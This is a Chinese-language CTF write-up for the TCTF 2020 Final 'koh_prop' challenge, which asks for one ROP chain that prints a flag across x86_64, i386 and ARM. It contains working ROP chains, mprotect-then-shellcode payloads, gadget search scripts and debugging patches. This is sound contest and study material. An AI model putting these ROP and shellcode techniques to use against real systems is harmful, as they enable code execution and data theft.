TCTF 2020 FINAL koh_prop

记录下这题koh

基本分析

下载程序后解压下：

ruan@ubuntu ~/release ls
rnd_generator  rop_aarch64  rop_arm  ropchain  rop_i386  rop_mips  rop_mips64  rop_mips64el  rop_mipsel  rop_ppc  rop_ppc64  rop_ppc64le  rop_x86_64   tester.py

可以看到一堆的rop+架构开头的程序，所以可以猜到大概就是一个rop打通多个版本，拿到题目的第一眼看下tester.py，这是给你本地测试用的

tester.py：

#!/usr/bin/python
# encoding: utf-8

import sys, os, ctypes, fcntl, random, string
import subprocess, shutil

MFD_ALLOW_SEALING = 2
F_ADD_SEALS = 1033
F_SEAL_SEAL = 1
F_SEAL_SHRINK = 2
F_SEAL_GROW = 4
F_SEAL_WRITE = 8

def test_rop(stub_name, ropchain, rop_memfd):
    if os.path.exists('test'):
        shutil.rmtree('test')
    os.mkdir('test')
    with file('test/ropchain', 'wb') as f:
        f.write(ropchain)
    with file('test/rop_stub', 'wb') as f:
        f.write(open(os.path.realpath(os.path.dirname(__file__)) + '/' + stub_name, 'rb').read())
    os.chmod('test/rop_stub', 0755)
	# 分析下面这个，得知我们要打印出flag，打印的长度不能多也不能少，要刚刚好，还要exit(0)
    for i in xrange(10):
        flag = ''.join([random.choice(string.letters+string.digits) for _ in xrange(random.randint(16,64))])
        with file('test/flag', 'wb') as f:
            f.write(flag)
        p = subprocess.Popen(['chroot', '--userspec=65534:65534', './test', '/rop_stub', str(rop_memfd.fileno()), 'ropchain'], stdin=open('/dev/null'), stdout=subprocess.PIPE, stderr=open('/dev/null', 'w'))	# stdin不能再用了
        output, _ = p.communicate()
        print 'Test %d: %d "%s" "%s"' % (i, p.returncode, output, flag)
        if p.returncode != 0:
            return False
        if output != flag:
            return False
    return True

def memfd_create(name):
    fd = ctypes.CDLL(None).syscall(319, name, MFD_ALLOW_SEALING)
    return os.fdopen(fd, "wb")

if __name__ == '__main__':
    if len(sys.argv) <= 3:
        exit()

    archs = {'i386':'rop_i386',
            'x86_64':'rop_x86_64',
            'arm':'rop_arm',
            'aarch64':'rop_aarch64',
            'mips':'rop_mips',
            'mipsel':'rop_mipsel',
            'mips64':'rop_mips64',
            'mips64el':'rop_mips64el',
            'powerpc':'rop_ppc',
            'powerpc64':'rop_ppc64',
            'powerpc64le':'rop_ppc64le',
            }

    arch = sys.argv[1]
    assert(arch in archs)
    seed = int(sys.argv[2])
    fname = sys.argv[3]
    ropchain = open(fname, 'rb').read()

    memfd = memfd_create('prop')
    size = 512*1024*1024
    p = subprocess.Popen([os.path.abspath(os.path.dirname(__file__)) + '/rnd_generator', str(seed), str(size)], stdin=subprocess.PIPE, stdout=memfd, stderr=subprocess.PIPE)	# 用rnd_generator根据种子生成512M的随机数
    p.wait()
    if p.returncode != 0:
        exit(-1)
    fcntl.fcntl(memfd.fileno(), F_ADD_SEALS, F_SEAL_SEAL|F_SEAL_SHRINK|F_SEAL_GROW|F_SEAL_WRITE)

    if test_rop(archs[arch], ropchain, memfd):		# 测试我们的ropchain
        print 'Test Success'
        exit(0)
    else:
        print 'Test Failure'
        exit(1)

连上端口后看下远程是怎么样子的：

[+] Opening connection to chall.0ops.sjtu.edu.cn on port 2005: Done
[DEBUG] Received 0x62 bytes:
    'sha256(XXXX+PYXyded8a245d3Z1) == 6501e74ef061fd9c570a17604b78f882aa345cee32f01d5f61f5acb9a8f07f6b\n'
[*] PYXyded8a245d3Z1
[*] 6501e74ef061fd9c570a17604b78f882aa345cee32f01d5f61f5acb9a8f07f6b
[*] OK!
[DEBUG] Sent 0x4 bytes:
    'o0yb'
[*] Switching to interactive mode
[DEBUG] Received 0x1a bytes:
    'Give me XXXX (Raw binary):'
Give me XXXX (Raw binary):[DEBUG] Received 0xc bytes:
    'Your token: '
Your token: $ 5c76ee943ec8e0279c9f075f611e8641
[DEBUG] Sent 0x21 bytes:
    '5c76ee943ec8e0279c9f075f611e8641\n'
[DEBUG] Received 0xb bytes:
    'Your seed: '
Your seed: $ 0
[DEBUG] Sent 0x2 bytes:
    '0\n'
[DEBUG] Received 0x17 bytes:
    'Size of your ROPChain: '
Size of your ROPChain: $ 32
[DEBUG] Sent 0x3 bytes:
    '32\n'
[DEBUG] Received 0x1c bytes:
    'Your ROPChain (Raw Binary): '
Your ROPChain (Raw Binary): $ aaaaaaaaaa
[DEBUG] Sent 0xb bytes:
    'aaaaaaaaaa\n'
$ aaa
[DEBUG] Sent 0x4 bytes:
    'aaa\n'
$ a
[DEBUG] Sent 0x2 bytes:
    'a\n'
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ aaa
[DEBUG] Sent 0x4 bytes:
    'aaa\n'
$ aa
[DEBUG] Sent 0x3 bytes:
    'aa\n'
[DEBUG] Received 0x84 bytes:
    'Which architecture you want to test?\n'
    'Available: i386 x86_64\n'
    'Your choice (or "exit"):Invalid architecture!\n'
    'Your score: 0\n'
    'Try harder!\n'
Which architecture you want to test?
Available: i386 x86_64 arm
Your choice (or "exit"):Invalid architecture!
Your score: 0
Try harder!
[*] Got EOF while reading in interactive
$ a
[DEBUG] Sent 0x2 bytes:
    'a\n'
$ 
[*] Interrupted
[*] Closed connection to chall.0ops.sjtu.edu.cn port 2005

写个脚本：

import hashlib,string
from pwn import *
p = remote("chall.0ops.sjtu.edu.cn","2005")

def pow():	
	p.recvuntil("sha256(XXXX+")
	postfix = p.recvuntil(")")[:-1]
	info(postfix)
	p.recvuntil(" == ")
	hash_ = p.recvuntil("\n")[:-1]
	info(hash_)
	charset = string.letters+string.digits
	for i in charset:
		for j in charset:
			for k in charset:
				for l in charset:
					suffix = i + j + k + l
					if hashlib.sha256(suffix+postfix).hexdigest() == hash_:
						info('OK!')
						p.send(suffix)
						return
	return
pow()
rop_chain = open("./ropchain","rb").read()
p.recvuntil("token: ")
p.sendline("5c76ee943ec8e0279c9f075f611e8641")
p.recvuntil("Your seed: ")
p.sendline("0")
p.recvuntil(":")
p.sendline(str(len(rop_chain)))
p.recvuntil(":")
p.send(rop_chain)
p.recvuntil('Your choice (or "exit"):')
p.sendline("i386")
p.interactive()

那大概流程就是本地打通了，再去打远程的，然后尽可能的让自己的rop能通过更多架构的test，拿到更多的分数，那现在就看下程序大概是怎么样子的

程序分析

首先肯定拿比较熟悉的开刀，就x86_64的吧：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rbp
  unsigned int v4; // eax
  unsigned int v5; // ST18_4
  __int64 file_sz; // rax
  unsigned int v7; // ST1C_4
  int i; // [rsp-28h] [rbp-28h]
  int j; // [rsp-28h] [rbp-28h]
  int v11; // [rsp-24h] [rbp-24h]
  __int64 v12; // [rsp-8h] [rbp-8h]

  __asm { endbr64 }
  v12 = v3;
  v4 = atoi(argv[1], argv, envp);	// 第一个参数，根据tester.py里的内容，这里应该就是那个memfd
  v5 = v4;
  file_sz = get_file_size(v4);
  mmap64(0x13370000uLL, (file_sz + 4095) & 0xFFFFFFFFFFFFF000LL, 5, 32786LL, v5, 0);	// 映射memfd，0x1337000开始的内容就是根据种子生成的随机数，可以看到权限是5，即可读可执行，其实也就是说我们最后用的gadget是来自这些随机数
  v7 = open64(argv[2], 0, (char)argv);	//打开我们的ropchain
  mmap64(0x73310000uLL, 0x10000000LL, 3, 32786LL, v7, 0);	// 将ropchain映射到内存中
  mmap64(0x10000uLL, 4096LL, 7, 50LL, 0xFFFFFFFFLL, 0);
  for ( i = 0;
        *((_BYTE *)&rop_trampoline + i) != 98
     || *((_BYTE *)&rop_trampoline + i + 1) != 101
     || *((_BYTE *)&rop_trampoline + i + 2) != 103
     || *((_BYTE *)&rop_trampoline + i + 3);
        ++i )
  {
    ;
  }
  v11 = 0;
  for ( j = i + 4;
        *((_BYTE *)&rop_trampoline + j) != 101
     || *((_BYTE *)&rop_trampoline + j + 1) != 110
     || *((_BYTE *)&rop_trampoline + j + 2) != 100
     || *((_BYTE *)&rop_trampoline + j + 3);
        *(_BYTE *)(v11++ + 0x10000LL) = *((_BYTE *)&rop_trampoline + j++) )	// 将rop_trampoline的内容写到0x10000地址处
  {
    ;
  }
  mprotect(0x10000LL, 4096LL, 5LL);		// 修改0x10000地址的权限，改为r-x，可读可执行
  MEMORY[0x10000](0x10000LL, 4096LL);	// 跳到0x10000开始执行，执行的是rop_trampoline
  return 0;
}

看下rop_trampoline是个啥：

.text:0000000000401D23 rop_trampoline:                         ; DATA XREF: main+DC↓o
.text:0000000000401D23 ; __unwind {
.text:0000000000401D23                 endbr64
.text:0000000000401D27                 push    rbp
.text:0000000000401D28                 mov     rbp, rsp
.text:0000000000401D28 ; ---------------------------------------------------------------------------
.text:0000000000401D2B aBeg            db 'beg',0
.text:0000000000401D2F ; ---------------------------------------------------------------------------
.text:0000000000401D2F                 mov     rax, 0Bh
.text:0000000000401D36                 mov     rdi, offset dword_400000
.text:0000000000401D3D                 mov     rsi, 100000h
.text:0000000000401D44                 syscall                 ; LINUX - sys_munmap
.text:0000000000401D46                 mov     rax, 0Bh
.text:0000000000401D4D                 mov     rdi, 100000000h
.text:0000000000401D57                 mov     rsi, 7FFEFFFFF000h
.text:0000000000401D61                 syscall                 ; LINUX - sys_munmap
.text:0000000000401D63                 mov     rax, ds:13370000h
.text:0000000000401D6B                 mov     rbx, ds:13370008h
.text:0000000000401D73                 mov     rcx, ds:13370010h
.text:0000000000401D7B                 mov     rdx, ds:13370018h
.text:0000000000401D83                 mov     rsi, ds:13370020h
.text:0000000000401D8B                 mov     rdi, ds:13370028h
.text:0000000000401D93                 mov     rbp, ds:13370030h
.text:0000000000401D9B                 mov     r8, ds:13370038h
.text:0000000000401DA3                 mov     r9, ds:13370040h
.text:0000000000401DAB                 mov     r10, ds:13370048h
.text:0000000000401DB3                 mov     r11, ds:13370050h
.text:0000000000401DBB                 mov     r12, ds:13370058h
.text:0000000000401DC3                 mov     r13, ds:13370060h
.text:0000000000401DCB                 mov     r14, ds:13370068h
.text:0000000000401DD3                 mov     r15, ds:13370070h
.text:0000000000401DDB                 mov     rsp, 73310000h
.text:0000000000401DE2                 retn
.text:0000000000401DE2 ; ---------------------------------------------------------------------------
.text:0000000000401DE3 aEnd            db 'end',0
.text:0000000000401DE7 ; ---------------------------------------------------------------------------
.text:0000000000401DE7                 nop
.text:0000000000401DE8                 pop     rbp
.text:0000000000401DE9                 retn

可以看到就是调用了munmap这些系统调用，把程序段还有libc，stack啥的都unmap掉了，我们可以下个断点在这里看下：

0x13370000是生成的随机数，0x73310000是我们的ropchain，继续单步直到retn：

xxd ropchain：

 ruan@ubuntu  /mnt/hgfs/shared/tctf2020final/koh/release  xxd ropchain
00000000: 7178 a41e 0000 0000 25b3 952d 0000 0000  qx......%..-....
00000010: 7973 3713 0000 0000 c800 3173 0000 0000  ys7.......1s....
00000020: 2f66 6c61 6700 0000 0000 0000 0000 0000  /flag...........
00000030: de35 3813 7d00 0000 d617 3713 0000 3173  .58.}.....7...1s
00000040: eb27 3913 0010 0000 d036 3813 0700 0000  .'9......68.....
00000050: 7f80 8214 5800 3173 80f3 2031 c9b0 05cd  ....X.1s.. 1....
00000060: 8089 c3b0 0366 89e2 b9ff 0331 73cd 8089  .....f.....1s...
00000070: c2b0 0431 db43 cd80 b001 31db cd80 0000  ...1.C....1.....
00000080: 8500 3173 0000 0000 4ff0 6707 80b4 dff8  ..1s....O.g.....
00000090: 0470 01e0 2f66 6c61 80b4 6846 81ea 0101  .p../fla..hF....
000000a0: 82ea 0202 4ff0 0507 41df 0546 4ff0 0100  ....O...A..FO...
000000b0: 2946 82ea 0202 4ff0 bb07 41df 80ea 0000  )F....O...A.....
000000c0: 4ff0 0107 41df 0000 4958 3713 0000 0000  O...A...IX7.....
000000d0: 0000 3173 0000 0000 e64d 3713 0000 0000  ..1s.....M7.....
000000e0: 0010 0000 0000 0000 d036 3813 0000 0000  .........68.....
000000f0: 0700 0000 0000 0000 de35 3813 0000 0000  .........58.....
00000100: 0a00 0000 0000 0000 e207 7b14 0000 0000  ..........{.....
00000110: 1801 3173 0000 0000 6683 f720 4831 f648  ..1s....f.. H1.H
00000120: 31c0 48ff c048 ffc0 0f05 505f 515e 6681  1.H..H....P_Q^f.
00000130: ceff 0366 89ca 4831 c00f 0550 5a48 31ff  ...f..H1...PZH1.
00000140: 48ff c748 89f8 0f05 6a3c 5848 31ff 0f05  H..H....j<XH1...

可以看到的是程序原先的段都被unmap掉了，这样的话，我们能用的gadget只能来自随机数了，所以直接在随机数中找gadget了，从tester.py脚本可以看到，生成的随机数有512M，你想要啥gadget，里面一般都能找得到

调试

程序的第一个参数是一个fd，但是我们直接用pwntools的process起程序的话，不太好搞，因为我们没有那个memfd，会导致get_file_size函数失败退出，所以当时对程序进行了patch，把atoi改成了open

• 原版x64：

.text:0000000000401DEE                 push    rbp
.text:0000000000401DEF                 mov     rbp, rsp
.text:0000000000401DF2                 sub     rsp, 30h
.text:0000000000401DF6                 mov     [rbp-24h], edi
.text:0000000000401DF9                 mov     [rbp-30h], rsi
.text:0000000000401DFD                 mov     rax, [rbp-30h]
.text:0000000000401E01                 add     rax, 8
.text:0000000000401E05                 mov     rax, [rax]
.text:0000000000401E08                 mov     rdi, rax
.text:0000000000401E0B                 call    atoi

__asm { endbr64 }
 v12 = v3;
 v4 = atoi(argv[1], argv, envp);
 fd = v4;
 v6 = get_file_size(v4);
 mmap64(0x13370000uLL, (v6 + 4095) & 0xFFFFFFFFFFFFF000LL, 5, 32786LL, fd, 0);

patch：

.text:0000000000401DEA main            proc near               ; DATA XREF: _start+21↑o
.text:0000000000401DEA ; __unwind {
.text:0000000000401DEA                 endbr64
.text:0000000000401DEE                 push    rbp
.text:0000000000401DEF                 mov     rbp, rsp
.text:0000000000401DF2                 sub     rsp, 30h
.text:0000000000401DF6                 mov     [rbp-24h], edi
.text:0000000000401DF9                 mov     [rbp-30h], rsi
.text:0000000000401DFD                 mov     rax, [rbp-30h]
.text:0000000000401E01                 add     rax, 8
.text:0000000000401E05                 mov     rdi, [rax]      ; Keypatch modified this from:
.text:0000000000401E05                                         ;   mov rax, [rax]
.text:0000000000401E08                 xor     rsi, rsi        ; Keypatch modified this from:
.text:0000000000401E08                                         ;   mov rdi, rax
.text:0000000000401E0B                 call    open64          ; Keypatch modified this from:
.text:0000000000401E0B                                         ;   call atoi

__asm { endbr64 }
 v14 = v3;
 v5 = open64(argv[1], 0, (__int64)envp, (__int64)&v14, v4);
 fd = v5;
 v7 = get_file_size(v5, 0LL);
 mmap64(0x13370000uLL, (v7 + 4095) & 0xFFFFFFFFFFFFF000LL, 5, 32786LL, fd, 0);

这样就可以用process起，gdb.attach贴上去调试了

• 原版i386

.text:08049DBE                 add     ebx, 9B242h
.text:08049DC4                 mov     esi, ecx
.text:08049DC6                 mov     eax, [esi+4]
.text:08049DC9                 add     eax, 4
.text:08049DCC                 mov     eax, [eax]
.text:08049DCE                 sub     esp, 0Ch
.text:08049DD1                 push    eax
.text:08049DD2                 call    atoi

patch

.text:08049DBE                 add     ebx, 9B242h
.text:08049DC4                 mov     eax, [ecx+4]    ; Keypatch modified this from:
.text:08049DC4                                         ;   mov esi, ecx
.text:08049DC4                                         ;   mov eax, [esi+4]
.text:08049DC4                                         ; Keypatch padded NOP to next boundary: 2 bytes
.text:08049DC7                 mov     eax, [eax+4]    ; Keypatch modified this from:
.text:08049DC7                                         ;   nop
.text:08049DC7                                         ;   nop
.text:08049DC7                                         ;   add eax, 4
.text:08049DC7                                         ; Keypatch padded NOP to next boundary: 2 bytes
.text:08049DC7                                         ; Keypatch modified this from:
.text:08049DC7                                         ;   add eax, 4
.text:08049DCA                 sub     esp, 0Ch        ; Keypatch modified this from:
.text:08049DCA                                         ;   nop
.text:08049DCA                                         ;   nop
.text:08049DCA                                         ;   mov eax, [eax]
.text:08049DCA                                         ; Keypatch padded NOP to next boundary: 1 bytes
.text:08049DCD                 push    0               ; Keypatch modified this from:
.text:08049DCD                                         ;   nop
.text:08049DCD                                         ; Keypatch modified this from:
.text:08049DCD                                         ;   push eax
.text:08049DCD                                         ;   sub esp, 0Ch
.text:08049DCD                                         ; Keypatch padded NOP to next boundary: 2 bytes
.text:08049DCF                 mov     esi, ecx        ; Keypatch modified this from:
.text:08049DCF                                         ;   nop
.text:08049DCF                                         ;   nop
.text:08049DD1                 push    eax
.text:08049DD2                 call    open            ; Keypatch modified this from:
.text:08049DD2                                         ;   call atoi
.text:08049DD7                 add     esp, 14h        ; Keypatch modified this from:
.text:08049DD7                                         ;   add esp, 10h

• arm原版：

.text:000104B2                 PUSH            {R7,LR}
.text:000104B4                 SUB             SP, SP, #0x28
.text:000104B6                 ADD             R7, SP, #8
.text:000104B8                 STR             R0, [R7,#0x20+var_1C]
.text:000104BA                 STR             R1, [R7,#0x20+var_20]
.text:000104BC                 LDR             R3, [R7,#0x20+var_20]
.text:000104BE                 ADDS            R3, #4
.text:000104C0                 LDR             R3, [R3]
.text:000104C2                 MOV             R0, R3
.text:000104C4                 BL              atoi

patch：

.text:000104B4                 SUB             SP, SP, #0x28
.text:000104B6                 ADD             R7, SP, #8
.text:000104B8                 STR             R0, [R7,#0x20+var_1C]
.text:000104BA                 STR             R1, [R7,#0x20+var_20]
.text:000104BC                 LDR             R3, [R7,#0x20+var_20]
.text:000104BE                 LDR             R3, [R3,#4] ; Keypatch modified this from:
.text:000104BE                                         ;   ADDS R3, #4
.text:000104C0                 MOV             R1, R4  ; Keypatch modified this from:
.text:000104C0                                         ;   LDR R3, [R3]
.text:000104C2                 MOV             R0, R3
.text:000104C4                 BL              open    ; Keypatch modified this from:
.text:000104C4                                         ;   BL atoi

解题

基本都分析好了之后，要开始拿分数了，koh这种赛制，个人觉得还是先解简单的，分数先拿了再说，你没解肯定是没分，所以就这题来说，当时先解了一个x64的，因为比较熟悉，koh按轮算的，先拿几轮的分数再说

• 找gadget，当时用了一个比较粗糙的方法：

 ruan@ubuntu  /mnt/hgfs/shared/tctf2020final/koh/release  python
Python 2.7.17 (default, Jul 20 2020, 15:37:01)
[GCC 7.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.arch='amd64'
>>> data = open("./rand_num","rb").read()
>>> data.find(asm("syscall;ret"))
21235682
>>> data.find(asm("pop rdi;ret"))
22601
>>>

其中rand_num文件生成方法是：

./rnd_generator 5 536870912 > rand_num

第一个参数5是seed，第二个参数是大小，就是512M，把输出重定向下就好

先解了x64的，拿了1分，当时的算分规则是一个架构1分，相同分数就比谁的ropchain短

本着先解决熟悉的架构，所以下一个开刀的就是i386了

需要注意的是，ropchain要同时能打通i386和x64的，这里很明显的一个就是他们的栈大小不同，一个是4字节，一个是8字节，我们可以依靠这个来把他们的栈区分开，这也是一个常用的方法

当时找了一个pop rax;pop rsp;ret的指令，这条指令在i386下是pop eax;pop esp;ret，这样就可以用两个架构栈的差别来把esp/rsp切到不同的地方，以便后续的rop

当时的一份pass [x86_64，i386]的(种子0)：

from pwn import *
context.update(os='linux', arch='amd64')
f = open("./ropchain","wb")
# x64
base = 0x13370000
xor_rsi = 478947635+base
syscall = 1145529+base
p_rdi = 18220+base
p_rsi = 104558+base
p_rdx = 139848+base
p_rax = 13983+base
push_rax = 92988+base
pop_rdx = 139848+base
mov_rbx_rax = 479242127+base
mov_rdx_rbx = 320191467+base
xor_rdi=56203569+base
mov_edi_eax = 616383+base
p_rax_rsp = 25812073+base
rop_chain = [
	0x733100e0,0x73310018,
	p_rdi,0x73310140,xor_rsi,p_rax,2,syscall,
	mov_edi_eax,p_rsi,0x73310200,p_rdx,0x100,p_rax,0,syscall,
	mov_rbx_rax,mov_rdx_rbx,p_rdi,1,p_rax,1,syscall,
	xor_rdi,p_rax,60,syscall
]

f.write(p64(p_rax_rsp)+flat(rop_chain))

base = 0x13370000
pop_eax = 13983+base
pop_ebx = 2954+base
pop_ecx = 33194+base
pop_edx = 139848+base
xor_ecx = 15208094+base
mov_edx_eax = 712592+base
mov_ebx_eax = 6174827+base
int80 = 10178206+base
xor_eax = 4968144+base
inc_eax = 45037+base
int80_ = 121847+base
# x32

rop_chain = [
	pop_eax,5,pop_ebx,0x73310140,xor_ecx,int80,
	mov_ebx_eax,pop_eax,3,pop_ecx,0x73310200,pop_edx,0x100,int80,
	mov_edx_eax,pop_eax,4,pop_ebx,1,int80,
	xor_eax,mov_ebx_eax,inc_eax,int80_
]

f.write(flat(rop_chain,word_size=32)+"/flag")
f.close()

栈的布局(x64)：

i386：

现在解决了两个架构，拿了2分，但是都用rop会导致payload太长了，所以当时改成了先mprotect(0x73310000,0x1000,7)下，直接执行shellcode，短了不少，其实还可以再去找找gadget，比如pop rdi;pop rax;pop rdx;ret这样连着的，也能使得payload的长度更短

这里贴一下当时shellcode的：

from pwn import *
context.update(os='linux', arch='amd64')
f = open("./ropchain","wb")
# x64
base = 0x13370000
xor_rsi = 478947635+base
syscall = 1145529+base
p_rdi = 18220+base
p_rsi = 104558+base
p_rdx = 139848+base
p_rax = 13983+base
push_rax = 92988+base
pop_rdx = 139848+base
mov_rbx_rax = 479242127+base
mov_rdx_rbx = 320191467+base
xor_rdi=56203569+base
mov_edi_eax = 616383+base
p_rax_rsp = 25812073+base
rop_chain = [
	0x733100a4,0x73310018,
	p_rdi,0x73310000,p_rsi,0x1000,p_rdx,7,p_rax,10,syscall,0x73310068
]

sc = asm("""
	xor di,0xf6
	xor rsi,rsi
	xor rax,rax
	inc rax
	inc rax
	syscall
	push rax
	pop rdi
	push rcx
	pop rsi
	or si,0x3ff
	mov dx,cx
	xor rax,rax
	syscall
	push rax
	pop rdx
	xor rdi,rdi
	inc rdi
	mov rax,rdi
	syscall
	push 60
	pop rax
	xor rdi,rdi
	syscall
""")

f.write(p64(p_rax_rsp)+flat(rop_chain)+sc+'\x90'*3)
# f.close()

base = 0x13370000
pop_eax = 13983+base
pop_ebx = 2954+base
pop_ecx = 33194+base
pop_edx = 139848+base
xor_ecx = 15208094+base
mov_edx_eax = 712592+base
mov_ebx_eax = 6174827+base
int80 = 10178206+base
xor_eax = 4968144+base
inc_eax = 45037+base
int80_ = 121847+base
# x32

rop_chain = [
	pop_eax,0x7d,pop_ebx,0x73310000,pop_ecx,0x1000,pop_edx,7,int80,0x733100cc
]

sc = asm("""
	xor bx,0xf6
	xor ecx,ecx
	mov al,5
	int 0x80
	mov ebx,eax
	mov al,3
	mov dx,sp
	mov ecx,0x733103ff
	int 0x80
	mov edx,eax
	mov al,4
	xor ebx,ebx
	inc ebx
	int 0x80
	mov al,1
	xor ebx,ebx
	int 0x80
""",arch='i386')

f.write(flat(rop_chain,word_size=32)+sc+"/flag")
f.close()

还能在优化就是了，但是当时时间有限，突破更多的架构才是上上策，可惜到了最后也没有解出第3个架构

arm,i386,x64

赛后问的AAA的师傅，用的种子5，找到的一个gadget：

offset:191723632
i386:
   0:   b0 08                   mov    al, 0x8
   2:   bd 3b ba 71 10          mov    ebp, 0x1071ba3b
   7:   95                      xchg   ebp, eax
   8:   58                      pop    eax
   9:   c3                      ret    
   a:   ea                      .byte 0xea
   b:   63 02                   arpl   WORD PTR [edx], ax
   d:   2c 10                   sub    al, 0x10
x64:
   0:   b0 08                   mov    al, 0x8
   2:   bd 3b ba 71 10          mov    ebp, 0x1071ba3b
   7:   95                      xchg   ebp, eax
   8:   58                      pop    rax
   9:   c3                      ret    
   a:   ea                      (bad)  
   b:   63 02                   movsxd eax, DWORD PTR [rdx]
   d:   2c 10                   sub    al, 0x10
arm:
   0:   b01e            add     sp, #120        ; 0x78
   2:   bd08            pop     {r3, pc}
   4:   ba3b            rev     r3, r7
   6:   1071            asrs    r1, r6, #1
   8:   5895            ldr     r5, [r2, r2]
   a:   eac3 0263       pkhtb   r2, r3, r3, asr #1
   e:   102c            asrs    r4, r5, #32

用的脚本(./search_gadget.py)：

from pwn import *
f = open("./rand_num","rb")
data = f.read()
f.close()

def show_disasm(code):
    print("i386:\n" + disasm(code[1:],arch='i386'))
    print("x64:\n" + disasm(code[1:],arch='amd64'))
    print("arm:\n" + disasm(code,arch='thumb'))

offset = 0
prev_offset = 0

while True:
    offset = data[prev_offset:].find(asm("add sp,#120",arch='thumb'))
    if(offset == -1):
        break
    offset += prev_offset
    print("offset:" + str(offset))
    show_disasm(data[offset:offset+0x10])
    prev_offset = offset+1
    print("---"*0x30)

这里可以看到我们arm用的arch不是arm，而是thumb，这里个人推测是程序有的指令长度是2字节，而thumb就是2字节的，还有一个就是i386和x64的code偏移了一个字节，输出显示的时候thumb端序和他们不一样

还有一个细节就是，可以打开arm程序的反汇编界面的此处：

.text:000105F0                 MOVS            R2, #5
.text:000105F2                 MOV.W           R1, #0x1000
.text:000105F6                 MOV.W           R0, #0x10000000
.text:000105FA                 BL              mprotect
.text:000105FE                 MOVS            R3, #0x10000001	<---------------
.text:00010604                 BLX             R3

你可以看到的是程序并不是直接跳转到0x10000000处，而是0x10000001处，偏移了一个字节，个人推测是arm这个是按大端序取的指令，这样pc指向0x10000001，执行的就是0x10000000和0x10000001处的指令，后面写payload的时候也有这个坑

最后的payload：

from pwn import *

f = open("./ropchain","wb")

base = 0x13370000

magic_gadget = 191723632+1+base

f.write(p64(magic_gadget))

# i386
base = 0x13370000
add_esp = 442413861+base
pop_eax = 79326+base
pop_ebx = 6102+base
pop_ecx = 141291+base
pop_edx = 79568+base
int80 = 21725311+base

rop_chain = [
	pop_eax,0x7d,pop_ebx,0x73310000,pop_ecx,0x1000,pop_edx,7,int80,0x73310058
]

sc = asm("""
	xor bl,0x20
	xor ecx,ecx
	mov al,5
	int 0x80
	mov ebx,eax
	mov al,3
	mov dx,sp
	mov ecx,0x733103ff
	int 0x80
	mov edx,eax
	mov al,4
	xor ebx,ebx
	inc ebx
	int 0x80
	mov al,1
	xor ebx,ebx
	int 0x80
""",arch='i386')

p_rsp = 29561+base

f.write(p32(add_esp)+p32(0)+p64(p_rsp)+p64(0x733100c8)+'/flag\x00\x00\x00'+p64(0)+flat(rop_chain,word_size=32)+sc+'\x00\x00')

# arm
context.arch = 'thumb'

rop_chain = [
	0x73310085
]

sc = asm(shellcraft.cat("/flag"))[:-10]+asm("mov r7,#0xbb;svc 0x41")+asm(shellcraft.exit(0))

f.write(flat(rop_chain,word_size=32)+"\x00"*4+sc+'\x00\x00')

# x64
context.arch = 'amd64'

stack = 0x733100c8

syscall = 21235682+base
p_rdi = 22601+base
p_rsi = 19942+base
p_rdx = 79568+base
p_rax = 79326+base

rop_chain = [
	p_rdi,0x73310000,p_rsi,0x1000,p_rdx,7,p_rax,10,syscall,0x73310118
]

# sc = asm("""
# 	xor di,0x20
# 	xor rsi,rsi
# 	xor rax,rax
# 	inc rax
# 	inc rax
# 	syscall
# 	push rax
# 	pop rdi
# 	push rcx
# 	pop rsi
# 	or si,0x3ff
# 	mov dx,cx
# 	xor rax,rax
# 	syscall
# 	push rax
# 	pop rdx
# 	xor rdi,rdi
# 	inc rdi
# 	mov rax,rdi
# 	syscall
# 	push 60
# 	pop rax
# 	xor rdi,rdi
# 	syscall
# """)
sc = '6683f7204831f64831c048ffc048ffc00f05505f515e6681ceff036689ca4831c00f05505a4831ff48ffc74889f80f056a3c584831ff0f05'.decode('hex') 
f.write(flat(rop_chain,word_size=64)+sc)

f.close()

单独拿出arm的讲下：

# arm
context.arch = 'thumb'

rop_chain = [
	0x73310085
]

sc = asm(shellcraft.cat("/flag"))[:-10]+asm("mov r7,#0xbb;svc 0x41")+asm(shellcraft.exit(0))

f.write(flat(rop_chain,word_size=32)+"\x00"*4+sc+'\x00\x00')

因为但是arm程序是用qemu-arm-static起的，段都是可执行的，所以我们可以直接跳到栈上执行shellcode，shellcode干两件事，一个是cat("/flag")，一个就是exit(0)，这里对arm不是很熟悉，所以直接用pwntools的shellcraft模块来生成payload，但是生成cat("/flag")的shellcode最后3条指令有点问题，所以直接截断补了自己补了两句上去asm(shellcraft.cat("/flag"))[:-10]+asm("mov r7,#0xbb;svc 0x41")

还有一个坑就是，这里直接跳栈上也要偏移一字节，所以是0x73310085，而不是0x73310084，前面还用了两个nop(“\x00”*4)指令来缓冲下

调试arm程序

这里还是和调试其他架构程序一样，一个终端用qemu起，一个终端用gdb-mutilarch连接端口调试

qemu-arm-static -g 1234 ./rop_arm ./rand_num ./ropchain
gdb-multiarch rop_arm -x ./arm_debug.gdb

arm_debug.gdb的内容：

b *0x00010604
target remote :1234
c
si
b *0x10000026
c
set $pc=$pc+26
set $l=6
while ($l)
    si
    set $l--
end

是个gdb的脚本

得用gef调试，然后就是调试的时候不知道为啥在这里莫名其妙的奔溃：

有时候可以，有时候不行，所以干脆直接跳过了，就是脚本那句set $pc=$pc+26

调试的时候也可以观察下pc的值和gef显示的code的地址其实是相差了1字节的

本地test

x86的和i386的没啥问题直接用：

sudo python tester.py i386 5 ./ropchain
sudo python tester.py x86_64 5 ./ropchain

用sudo是因为要用chroot

arm的稍微修改下tester.py：

def test_rop(stub_name, ropchain, rop_memfd):
    if os.path.exists('test'):
        shutil.rmtree('test')
    os.mkdir('test')
    with file('test/ropchain', 'wb') as f:
        f.write(ropchain)
    with file('test/rop_stub', 'wb') as f:
        f.write(open(os.path.realpath(os.path.dirname(__file__)) + '/' + stub_name, 'rb').read())
